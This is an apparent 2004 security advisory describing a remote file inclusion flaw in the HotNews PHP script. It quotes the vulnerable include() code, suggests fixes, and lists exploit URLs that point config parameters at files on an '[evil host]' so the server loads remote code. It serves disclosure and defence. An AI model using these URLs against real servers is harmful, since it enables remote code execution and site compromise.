HotNews arbitary file inclusion.
===+++===+++===+++
Product: HotNews
Version: <= v0.7.2
Vendor: http://sourceforge.net/projects/hotnews/
Bug discovered by: Officerrr <officerrr_at_poligon.com.pl>
Vendor Response: Not contacted yet.
===+++===+++===+++
Problem #1:
===+++===+++===+++
Attacker can include any file from remote or local
server.
PHP Code/Location #1:
===+++===+++===+++
-- from hotnews-engine.inc.php3
[...]
/*
// Init
$pagetitle = $config["pagename"];
if (!empty($config["header"])) {
include($config["header"]);
}
[...]
PHP Code/Location #2:
===+++===+++===+++
-- from hnmain.inc.php3
[...]
// Init
include($config["incdir"] . "hndefs.inc.php3");
include($config["incdir"] . "func.inc.php3");
include($config["incdir"] . "getopts.inc.php3");
include($config["incdir"] . "db.".$config["db_type"].".inc.php3");
if (!$config["no_fasttpl"]) {
include($config["incdir"] . "class.FastTemplate.php3");
}
include($config["incdir"] . "class.CachedFastTemplate.php3");
[...]
Exploit:
===+++===+++===+++
http://[victim]/includes/hotnews-engine.inc.php3?config[header]=http://[evil host]/[evil file]
http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/func.inc.php3
http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php3
etc...
Fix #1:
===+++===+++===+++
Turn off global_variables.
Fix #2:
===+++===+++===+++
Use .htaccess to protect files in the 'includes' directory.
--
Pozdrawiam,
Dariusz 'Officerrr' Kolasinski
<Linux Administrator> <gg: 516354>
"Living on a razors edge, Balancing on a ledge"
Received on Jan 05 2004
Intro
